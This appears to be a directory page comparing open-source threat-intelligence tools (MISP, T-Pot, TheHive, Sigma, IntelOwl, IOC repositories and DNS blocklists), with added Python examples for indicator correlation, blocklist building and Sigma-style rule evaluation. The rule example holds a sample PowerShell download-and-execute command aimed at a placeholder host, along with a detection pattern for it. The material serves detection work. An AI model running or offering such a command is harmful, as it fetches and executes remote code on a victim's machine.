30 open-source projects similar to avast/ioc, ranked by how many features they have in common. Compare stars, activity and what each one does to find the best Ioc alternative.
MISP is an open-source threat intelligence sharing platform designed for collecting, storing, and distributing structured threat indicators and intelligence. At its core, it provides a distributed synchronization protocol for transferring events between instances, an attribute-based correlation engine that links matching indicators across events, and a REST API with an OpenAPI specification for programmatic access to threat data. The platform uses formal data formats for JSON, taxonomy, galaxy, and object templates to enable compatibility across tools and communities. The platform distinguish
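The attribute-based correlation described above is the part of MISP most worth seeing in code. The block below is an added example written for this page, not MISP's own correlation engine: it takes events in a simplified MISP-like shape (constructed data, not real MISP output), expands composite `type|type` attributes into their parts, skips non-correlating types such as comments, and links events that share an exact value or whose single IP falls inside another event's CIDR attribute. The event ids, indicator values and the `NON_CORRELATING` set are assumptions for illustration.

```python
"""Attribute-based correlation across threat-intel events (added example)."""
import ipaddress
from collections import defaultdict
from itertools import combinations

# Attribute types that must never create a correlation on their own (assumed set).
NON_CORRELATING = {"comment", "text", "port"}

# Constructed events in a simplified MISP-like layout; values are placeholders.
# The sha256 is the hash of the empty string, used only as a sample value.
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
EVENTS = [
    {"id": 1, "info": "Phishing campaign A", "Attribute": [
        {"type": "domain", "value": "Login-Update.example"},
        {"type": "ip-dst", "value": "203.0.113.45"},
        {"type": "sha256", "value": EMPTY_SHA256},
        {"type": "comment", "value": "first seen 2024-01-01"}]},
    {"id": 2, "info": "C2 infrastructure report", "Attribute": [
        {"type": "ip-dst", "value": "203.0.113.0/24"},
        {"type": "ip-dst|port", "value": "198.51.100.7|443"}]},
    {"id": 3, "info": "Malware sample", "Attribute": [
        {"type": "sha256", "value": EMPTY_SHA256.upper()},
        {"type": "domain", "value": "login-update.example"}]},
    {"id": 4, "info": "Unrelated scan", "Attribute": [
        {"type": "ip-dst", "value": "198.51.100.7"}]},
]


def split_attribute(attr):
    """Expand an attribute into (type, value) parts.

    Composite types such as 'ip-dst|port' carry two values joined by '|';
    each part is correlated separately. Values are normalised to lower case
    so hashes and domains match regardless of how the contributor typed them.
    """
    types = attr["type"].split("|")
    values = attr["value"].split("|")
    if len(types) != len(values):  # malformed composite: correlate on the whole value
        return [(attr["type"], attr["value"].strip().lower())]
    return [(t, v.strip().lower()) for t, v in zip(types, values)]


def build_index(events):
    """Index exact values, plus IP networks and single hosts for CIDR matching."""
    exact = defaultdict(set)   # normalised value -> set of event ids
    networks = []              # (ip_network, event id) for CIDR attributes
    hosts = []                 # (ip_address, event id) for single-address attributes
    for ev in events:
        for attr in ev["Attribute"]:
            for typ, val in split_attribute(attr):
                if typ in NON_CORRELATING:
                    continue
                exact[val].add(ev["id"])
                if typ.startswith("ip-"):
                    try:
                        net = ipaddress.ip_network(val, strict=False)
                    except ValueError:
                        continue  # not a parseable address; exact matching still applies
                    if net.num_addresses > 1:
                        networks.append((net, ev["id"]))
                    else:
                        hosts.append((net.network_address, ev["id"]))
    return exact, networks, hosts


def correlate(events):
    """Return {(event_a, event_b): [reasons]} for every pair of linked events."""
    exact, networks, hosts = build_index(events)
    links = defaultdict(set)
    for val, ids in exact.items():
        for a, b in combinations(sorted(ids), 2):  # same value in two events
            links[(a, b)].add(val)
    for net, net_id in networks:
        for host, host_id in hosts:
            if host_id != net_id and host in net:  # single IP inside another event's CIDR
                links[tuple(sorted((host_id, net_id)))].add(f"{host} in {net}")
    return {pair: sorted(reasons) for pair, reasons in links.items()}


if __name__ == "__main__":
    for pair, reasons in sorted(correlate(EVENTS).items()):
        print(pair, reasons)
```

Running it links events 1 and 3 on the domain and the hash, 1 and 2 on the CIDR containment, and 2 and 4 on the IP part of the composite attribute, while the shared port 443 and the comment create no link. A real correlation engine also has to decide what to do with very common values (a well-known DNS resolver, an empty-file hash like the one above), which is why MISP lets attributes opt out of correlation; that per-attribute flag is not modelled here.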
T-Pot is a multi-honeypot orchestration platform and threat intelligence collector. It utilizes a Docker-based security sandbox to deploy and manage a collection of diverse decoy services that simulate vulnerable targets to lure attackers and record their activity. The system features a distributed sensor network where remote nodes capture attack logs and transmit them via encrypted communication to a central hub. This central hub employs an analytics stack to transform raw logs into geographic maps and interactive dashboards for adversary behavior visualization. To increase the realism of si
T-Pot is a multi-honeypot platform and threat intelligence framework that deploys a collection of containerized decoy services to capture attacker behavior and network telemetry. It functions as a Docker-based deception system, simulating vulnerable network environments to gather intelligence on threat actors. The system features a distributed sensor network using a hub-and-spoke architecture, allowing remote sensors to transmit logs back to a central management hub. It integrates large language models to create a dynamic deception engine capable of adaptive interactions with attackers. The
TheHive is a security incident response platform and multi-tenant case management system. It functions as a Security Orchestration, Automation, and Response (SOAR) tool and a threat intelligence platform designed to coordinate security investigations by managing alerts, cases, and observables. The platform is distinguished by its multi-tenant architecture, which isolates data across different organizations while supporting selective cross-tenant sharing. It features a SOAR automation engine capable of executing sandboxed JavaScript logic to automate workflows and trigger response actions thro
This project is a detection-as-code framework providing a library of security monitoring rules and predefined detection content for Elasticsearch data indices. It serves as a threat detection rule library designed to identify malicious activity and attack patterns across diverse data streams in cloud and on-premises environments. The framework implements a detection engineering workflow where rules are defined in YAML and managed as versioned code. It includes a set of command-line utilities for automated rule deployment, metadata searching, and template generation, supported by a Python-base
Lists is a curated collection of DNS blocklists, a domain blocklist generator, and a categorized library of domains used for network content filtering. The project provides a command-line pipeline that aggregates upstream sources to build and validate blocklists used to redirect unwanted traffic to null addresses. The project distinguishes itself through a CLI-driven build pipeline that automates the fetching, validation, and daily regeneration of datasets. It organizes domains into discrete functional categories rather than a single monolithic list and exports them in multiple syntaxes, incl
This is where I'll post IOCs from malware investigations
Indicators of Compromise (IOCs) from our various investigations
This project is a comprehensive repository of curated domain blocklists designed for network-wide DNS filtering. It functions as a DNS sinkhole feed, providing the necessary data to intercept and block unwanted network requests at the resolution layer before they reach their destination. By returning null or loopback addresses for identified domains, it prevents connections to malicious infrastructure, advertising servers, and tracking endpoints across all devices on a network. The repository distinguishes itself through a tiered categorization logic that allows users to select protection lev
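Both blocklist projects above describe the same pipeline: fetch upstream feeds in mixed syntaxes, validate and deduplicate the domains, and export them in the formats that hosts files, DNS resolvers and ad-blockers consume, with a sinkhole address such as 0.0.0.0 standing in for the real answer. The block below is an added example of that pipeline written for this page; it is not code from either project. The two upstream feeds are constructed inline, the `ALLOWLIST` and `LOCAL_NAMES` sets are assumptions, and the subdomain collapse is a design choice for wildcard-capable backends rather than something the projects are documented to do.

```python
"""Aggregate, validate and export a DNS blocklist (added example)."""
import re

# Constructed upstream feeds in the two common syntaxes; not real sources.
SOURCE_HOSTS = """\
# hosts-style feed
127.0.0.1 localhost
0.0.0.0 ads.example.com
0.0.0.0 Tracker.Example.net   # mixed case and an inline comment
0.0.0.0 bad_host.example      # underscore is not valid in a hostname
"""
SOURCE_PLAIN = """\
ads.example.com
cdn.ads.example.com
phish.example.org
-leading-hyphen.example
"""

ALLOWLIST = {"phish.example.org"}  # assumed operator exceptions, never blocked
LOCAL_NAMES = {"localhost", "localhost.localdomain", "local", "broadcasthost",
               "ip6-localhost", "ip6-loopback"}
SINKHOLE_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::", "::1"}

# RFC 1123 hostname labels; the last label must start with a letter so that
# bare IPv4 addresses are rejected rather than treated as domains.
LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
DOMAIN_RE = re.compile(rf"^(?:{LABEL}\.)+[a-z][a-z0-9-]{{1,62}}$")


def is_valid_domain(name):
    return len(name) <= 253 and DOMAIN_RE.fullmatch(name) is not None


def parse_feed(text):
    """Yield candidate names from hosts-style or plain-domain lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        parts = line.split()
        if len(parts) >= 2 and parts[0] in SINKHOLE_ADDRESSES:
            name = parts[1]          # hosts syntax: "<sinkhole> <domain>"
        else:
            name = parts[0]          # plain syntax: one domain per line
        yield name.lower().rstrip(".")


def build_blocklist(feeds, allowlist=frozenset()):
    """Merge feeds, drop local names, allowlisted names and invalid syntax."""
    names = set()
    for text in feeds:
        for name in parse_feed(text):
            if name in LOCAL_NAMES or name in allowlist or not is_valid_domain(name):
                continue
            names.add(name)
    return sorted(names)


def collapse_subdomains(names):
    """Drop names whose parent is already listed.

    Only correct for backends that block a domain and all its subdomains
    (adblock and dnsmasq syntaxes below); a hosts file needs every name.
    """
    listed = set(names)
    keep = []
    for name in names:
        parents = [name.split(".", i)[-1] for i in range(1, name.count("."))]
        if not any(parent in listed for parent in parents):
            keep.append(name)
    return keep


FORMATS = {
    "plain": lambda d: d,
    "hosts": lambda d: f"0.0.0.0 {d}",
    "adblock": lambda d: f"||{d}^",
    "dnsmasq": lambda d: f"address=/{d}/0.0.0.0",
}


def export(names, fmt):
    return "\n".join(FORMATS[fmt](d) for d in names) + "\n"


if __name__ == "__main__":
    blocked = build_blocklist([SOURCE_HOSTS, SOURCE_PLAIN], ALLOWLIST)
    print(export(blocked, "hosts"), end="")
    print(export(collapse_subdomains(blocked), "dnsmasq"), end="")
```

The validation step is what keeps a junk upstream line from turning into a resolver config syntax error or, worse, a line such as `0.0.0.0 localhost` from sinkholing a name the host depends on; that is why local names are filtered before the allowlist is even consulted.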
This is the repository for indicators of compromise (IOCs) and other data supporting threat intelligence articles posted on the Palo Alto Networks Unit 42 website.
This project is a curated, version-controlled directory of software and resources designed for cybersecurity professionals and researchers. It functions as a centralized knowledge base that aggregates and organizes external security utilities into a structured taxonomy to facilitate discovery and access for specialized research and testing tasks. The repository distinguishes itself through a community-driven model where external resource locations are verified and maintained by contributors. By leveraging a distributed version control system, the project ensures the historical integrity and c
Blocklist for newly created scam, phishing, and other malicious domains automatically retrieved daily using Google Search API, automated detection, and public databases.
Tool to gather Threat Intelligence indicators from publicly available sources
C2 Tracker is a free-to-use, community-driven IOC feed that uses Shodan ~~and Censys~~ searches to collect IP addresses of known malware/botnet/C2 infrastructure.
A repository of extracted content from thousands of threat intelligence reports, with automatic extraction of reports from various feeds!
Sigma is a generic SIEM signature format and log event pattern standard used to describe malicious activity. It provides a vendor-neutral system for defining security event patterns in YAML, ensuring that detection logic remains portable across different monitoring platforms. The project maintains a curated library of peer-reviewed detection rules that identify threats and compliance violations. This standardized approach allows for the exchange of threat hunting logic and the translation of generic signatures into specific queries for various security information and event management systems
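The detection-as-code rule library and Sigma above both rest on the same idea: a rule is a YAML document whose `detection` block names one or more selections and combines them in a `condition`, and the same rule can be evaluated directly or translated into a backend query. The block below is an added example written for this page, not code from the Sigma project or its tooling (for real translation, the project's own pySigma and sigma-cli do that job). It evaluates a constructed rule, shown as the Python equivalent of its YAML, against constructed process-creation events; it supports the `contains`, `startswith` and `endswith` modifiers, case-insensitive matching as Sigma specifies for strings, and `and`/`or`/`not` with parentheses in the condition, but not the `1 of selection*` quantifier forms. The rule title, field values and event ids are assumptions.

```python
"""Evaluate a Sigma-style detection rule against log events (added example)."""

# Constructed rule, the Python equivalent of a Sigma YAML document.
# It is hypothetical and not taken from the Sigma rule repository.
RULE = {
    "title": "PowerShell download cradle (constructed example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["IEX", "Invoke-Expression", "DownloadString"],
        },
        "filter_system": {"User|startswith": "NT AUTHORITY\\"},
        "condition": "selection and not filter_system",
    },
}

# Constructed events using the field names Sigma uses for process_creation logs.
PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    {"id": "e1", "Image": PS_IMAGE, "User": "CORP\\jdoe",
     "CommandLine": "powershell -nop -w hidden IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a')"},
    {"id": "e2", "Image": PS_IMAGE, "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "powershell Invoke-Expression (Get-Content script.ps1)"},
    {"id": "e3", "Image": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\jdoe",
     "CommandLine": "cmd /c whoami"},
    {"id": "e4", "Image": PS_IMAGE, "User": "CORP\\jdoe",
     "CommandLine": "powershell Get-Process"},
]


def _match(actual, expected, modifier):
    """Sigma string matching is case-insensitive; modifiers narrow the comparison."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    return a == e  # no modifier: exact match


def selection_matches(selection, event):
    """Fields in a selection map are ANDed; a list of values for one field is ORed."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match(event[field], v, modifier) for v in values):
            return False
    return True


def eval_condition(condition, results):
    """Recursive-descent evaluation of e.g. 'a and not (b or c)' over named results."""
    tokens = condition.replace("(", " ( ").replace(")", " ) ").split()
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        if pos >= len(tokens):
            raise ValueError("unexpected end of condition")
        pos += 1
        return tokens[pos - 1]

    def parse_or():
        value = parse_and()
        while peek() == "or":
            take()
            rhs = parse_and()
            value = value or rhs
        return value

    def parse_and():
        value = parse_not()
        while peek() == "and":
            take()
            rhs = parse_not()
            value = value and rhs
        return value

    def parse_not():
        if peek() == "not":
            take()
            return not parse_not()
        return parse_atom()

    def parse_atom():
        tok = take()
        if tok == "(":
            value = parse_or()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return value
        if tok not in results:
            raise ValueError(f"unknown selection {tok!r} in condition")
        return results[tok]

    value = parse_or()
    if pos != len(tokens):
        raise ValueError("trailing tokens in condition")
    return value


def rule_matches(rule, event):
    detection = rule["detection"]
    results = {name: selection_matches(sel, event)
               for name, sel in detection.items() if name != "condition"}
    return eval_condition(detection["condition"], results)


def matching_ids(rule, events):
    return [ev["id"] for ev in events if rule_matches(rule, ev)]


if __name__ == "__main__":
    print(RULE["title"], "->", matching_ids(RULE, EVENTS))
```

Only `e1` fires: `e2` matches the selection but is excluded by the SYSTEM-account filter, `e3` is not PowerShell, and `e4` carries none of the cradle strings. Note that the filter as written is a trust decision, not a detection one; a rule library reviewer would ask whether suppressing every NT AUTHORITY invocation is acceptable in the environment before shipping it.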
Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments. #nsacyber
Multithreaded threat intelligence gathering built with Python 3
IntelOwl is a threat intelligence platform and security orchestration engine designed to aggregate, analyze, and enrich security observables. It functions as a security incident investigation tool and a threat intelligence aggregator, collecting data on files, domains, and IP addresses from diverse internal and external sources. The system differentiates itself through playbook-based workflow automation, allowing users to define reusable sequences of analysis tasks that trigger subsequent jobs based on prior outputs. It unifies disparate security data into a common schema and utilizes protoco
This repository contains files with indicators supporting social media posts designed to disseminate timely threat intelligence data from Palo Alto Networks' Unit 42 team.